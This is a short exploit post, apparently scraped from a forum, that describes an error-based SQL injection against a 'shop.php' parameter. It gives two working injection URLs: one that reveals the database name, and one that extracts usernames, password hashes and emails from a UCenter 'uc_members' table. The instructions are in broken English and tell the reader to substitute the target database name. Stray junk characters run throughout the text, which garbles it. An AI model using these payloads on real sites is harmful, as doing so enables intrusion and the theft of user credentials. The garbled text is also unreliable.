0 k1 i0 B) J: _5 ^# Efor Inject : http://server/shop.php?ac=view&shopid=253 and(select 1 from(select count(*),concat((select (select concat(0x7e,0x27,unhex(hex(database())),0x27,0x7e)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1 * H- z! h q1 L2 _ : l# _/ h2 P4 ?- b2 {.. 9 f) r' o% M- O% a5 N/ t
) ?) p q8 p" j1 o, b5 sDB : Okey. 5 |( W+ a: r4 j! G/ l % _+ C) R2 |, f6 p5 P- F8 Uyour edit DB `[TARGET DB NAME]` 9 G" I1 S% L. G2 e2 I - d% o. e3 C' S% xExample : 'hiwir1_ucenter' ' E0 J! k( }+ O) |9 I0 u
- M8 j2 O U' g$ R1 Z1 @* c
Edit : Okey. 0 G' S" ?' F8 c$ @# p4 h+ o4 \, K6 s1 I" F
Your use Hex conversion. And edit Your SQL Injection Exploit.. 9 k; n, B+ G" r9 s$ O+ T 1 Z8 ^6 z$ n: l0 H E" W " v- {" x* h; G+ e
8 y, {2 x# [! H# I% x
Exploit Code : http://server/shop.php?ac=view&shopid=253 253 and(select 1 from(select count(*),concat((select (select (SELECT concat(0x7e,0x27,cast(concat(uc_members.uid,0x3a,uc_members.username,0x3a,uc_members.password,0x3a,uc_members.email) as char),0x27,0x7e) FROM `hiwir1_ucenter`.uc_members LIMIT 0,1) ) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1 8 T3 a6 D, \: r4 n2 c